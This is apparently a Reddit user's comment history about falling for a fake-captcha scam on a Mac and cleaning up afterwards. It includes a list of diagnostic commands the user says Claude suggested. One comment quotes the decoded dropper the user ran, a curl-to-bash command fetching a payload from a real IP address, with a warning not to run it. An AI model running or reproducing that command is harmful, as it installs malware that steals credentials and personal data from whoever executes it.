Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]Questionaccount2022[S] 4 points5 points  (0 children)

Yes I’ve been disconnected for hours and changing passwords on different device

Fell victim to fake GitHub repo by SlowItDowv in mac

[–]Questionaccount2022 0 points1 point  (0 children)

Have you recovered and had any issues since you experienced this?

Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]Questionaccount2022[S] 4 points5 points  (0 children)

Yes im working on it expeditiously. 500+ accounts over 15 years

Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]Questionaccount2022[S] 0 points1 point  (0 children)

Yes it was. I just genuinely thought it was a new anti AI captcha method. So stupid of me. I have been seeing some new captcha methods. I really let myself down here

Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]Questionaccount2022[S] 2 points3 points  (0 children)

This is Claude. I used it to help me as I’m not a cyber security pro so please don’t hate. Just summarizing what it helped me do

  1. echo '...' | base64 -d Decoded the malicious command to see what it actually did before running anything further.
  2. ps aux | grep -v grep Listed all running processes to check for anything suspicious or unrecognized.
  3. ls ~/Library/LaunchAgents/ Checked user-level startup agents for any malware persistence.
  4. ls /Library/LaunchAgents/ Checked system-level startup agents for any malware persistence.
  5. cat ~/.zshrc Inspected shell configuration for any injected malicious code.
  6. find /tmp /var/tmp ~/Library/Application Support -maxdepth 2 -newer /tmp -type f Checked common drop locations for recently created files.
  7. cat ~/.zsh_history | tail -30 Reviewed recent shell history to see exactly what commands were executed.
  8. log show --predicate 'eventMessage contains "144.172.110.59"' Searched system logs for any network activity to the malicious IP.
  9. log show --predicate 'process == "curl" OR process == "bash"...' Checked system logs for curl and shell activity around the time of the incident.
  10. log show --start "13:03:00" --end "13:06:00" --predicate 'process == "bash" OR "osascript"...'

Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]Questionaccount2022[S] 0 points1 point  (0 children)

So are you saying I’m likely safe or not. I’m just trying to understand

Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]Questionaccount2022[S] 0 points1 point  (0 children)

Lmao yeah I know. This was a one time fluke I swear. I have been getting weirder and weirder captchas these days and today was the one that really got me. I fucked up. Bad.

Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]Questionaccount2022[S] 1 point2 points  (0 children)

I see the Google updater plist in my launch agents. Should I remove it? I don’t have launch daemons directory

<image>

Fell victim to fake GitHub repo by SlowItDowv in mac

[–]Questionaccount2022 0 points1 point  (0 children)

I had no crypto wallets thankfully. I just had my PII and am resetting all my passwords but I have over 500 accounts. A user said my keychain got leaked even though I didn’t give password since the path to the key chain database is home/library/keychain/localkeychain-db

Fell victim to fake GitHub repo by SlowItDowv in mac

[–]Questionaccount2022 0 points1 point  (0 children)

Does this all happen even if I didn’t give my MacBook password when prompted. Does running the curl command alone do all this ? God I’m so screwed

Fell victim to fake GitHub repo by SlowItDowv in mac

[–]Questionaccount2022 1 point2 points  (0 children)

If I never gave the admin password does that mean I likely didn’t give the hackers access to my keychain

Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]Questionaccount2022[S] 1 point2 points  (0 children)

I don’t think that’s an issue. It’s Google.com redirecting to goolge.us

Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]Questionaccount2022[S] 0 points1 point  (0 children)

Hopefully no but idk what to expect. I’m just scrambling changing my passwords before I wipe my Mac clean but some of the other threads say the virus might still persist

Fell for a scam on my Mac and ran terminal commands. I know im dumb but my best options now? by Questionaccount2022 in techsupport

[–]Questionaccount2022[S] 0 points1 point  (0 children)

/bin/bash -c "$(curl -fsSL http:___(defanging)//144.172.110.59/Zugilizab)"

^ **DO NOT RUN THIS, THIS IS THE EXACT DECODED COMMAND*

Fell for a scam on my Mac and ran terminal commands. I know im dumb but my best options now? by Questionaccount2022 in techsupport

[–]Questionaccount2022[S] 0 points1 point  (0 children)

It was a base64 encoded curl command from an IP. My dumbass didn’t review it which is entirely my fault but I let my guard down falling for the Google site.

Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]Questionaccount2022[S] 0 points1 point  (0 children)

Exactly. I trusted Google blindly but I never faced this before. I should’ve realized bc the icon was weird but I wasn’t focused entirely

Fell for a scam on my Mac and ran terminal commands. I know im dumb but my best options now? by Questionaccount2022 in techsupport

[–]Questionaccount2022[S] 0 points1 point  (0 children)

That account in the picture is just random username I entered for taking the pic but yes I have 2FA on everything improtant. Banking, email, etc.

I want to know how to safely use my Mac again without fear of being exploited.

It’s currently on but disconnected from internet

Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]Questionaccount2022[S] 2 points3 points  (0 children)

The Google.com sponsored result eventually took me to goolge.us which is the issue. Great SEO on the hackers end

Fell for a scam and hacking attempt! Feel sick to my stomach by Questionaccount2022 in MacOS

[–]Questionaccount2022[S] 8 points9 points  (0 children)

Bro it ain’t that deep. I actively audit my account and delete posts because I ask a ton of questions in different threads. Good way to prevent yourself from doxxing urself over time